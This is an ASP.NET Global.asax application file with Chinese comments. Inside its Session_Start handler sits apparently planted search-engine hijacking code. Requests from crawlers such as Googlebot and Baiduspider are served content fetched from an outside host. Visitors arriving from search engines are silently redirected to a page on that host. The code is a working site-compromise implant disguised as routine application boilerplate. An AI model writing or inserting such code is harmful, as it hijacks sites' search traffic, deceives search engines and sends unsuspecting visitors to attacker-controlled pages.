<%@ Application Language="C#" %> 
<script runat="server">

    void Application_Start(object sender, EventArgs e) 
    {
        //在应用程序启动时运行的代码
    }
    
    void Application_End(object sender, EventArgs e) 
    {
        //在应用程序关闭时运行的代码
    }
        
    void Application_Error(object sender, EventArgs e) 
    { 
        //在出现未处理的错误时运行的代码
    }

    void Session_Start(object sender, EventArgs e) 
    {
        //在新会话启动时运行的代码
        //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent);
            string data_url = "http://www.fuck.com";//要展示给搜索引擎的页面
        string redirect_url="http://www.fuck.com/1.asp";//从搜索引擎点击进来跳转的页面
        if (is_spider())
        {
            HttpContext.Current.Response.Clear();
            HttpContext.Current.Response.BinaryWrite(get_data(data_url));
            HttpContext.Current.Response.End();
        }
        else if(is_from_search())
        {
            HttpContext.Current.Response.Redirect(redirect_url, true);
        }
        else
        {
            //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent);
        }
    }

    void Session_End(object sender, EventArgs e) 
    {
        //在会话结束时运行的代码。 
        // 注意: 只有在 Web.config 文件中的 sessionstate 模式设置为
        // InProc 时，才会引发 Session_End 事件。如果会话模式 
        //设置为 StateServer 或 SQLServer，则不会引发该事件。

    }
    public bool is_spider()
    {
        string spider_flag = "googlebot|baiduspider|sogou|yahoo|soso";//这里添加搜索引擎user-agent标识
        string[] spider_flag_arr = spider_flag.Split('|');
        string user_agent=HttpContext.Current.Request.UserAgent;
        foreach (string tmp_flag in spider_flag_arr)
        {
            if (user_agent.ToLower().IndexOf(tmp_flag.ToLower())!=-1) { return true; }
        }
        return false;
    }
        public bool is_from_search()
    {
        if (HttpContext.Current.Request.UrlReferrer==null)
        {
        return false;
        }
        else
        {
        string page_ref = HttpContext.Current.Request.UrlReferrer.ToString();
        string search_flag = "google|baidu|sogou|yahoo|soso"; //这里添加搜索引擎url标识
        string[] search_flag_arr = search_flag.Split('|');
        foreach (string tmp_flag in search_flag_arr)
        {
            if (page_ref.ToLower().IndexOf(tmp_flag.ToLower()) != -1) { return true; }
        }
        return false;
        }
    }
    public byte[] get_data(string url)
    {
        System.Net.WebClient wc = new System.Net.WebClient();
        byte[] data = wc.DownloadData(url);
        return data;
    }
       
</script>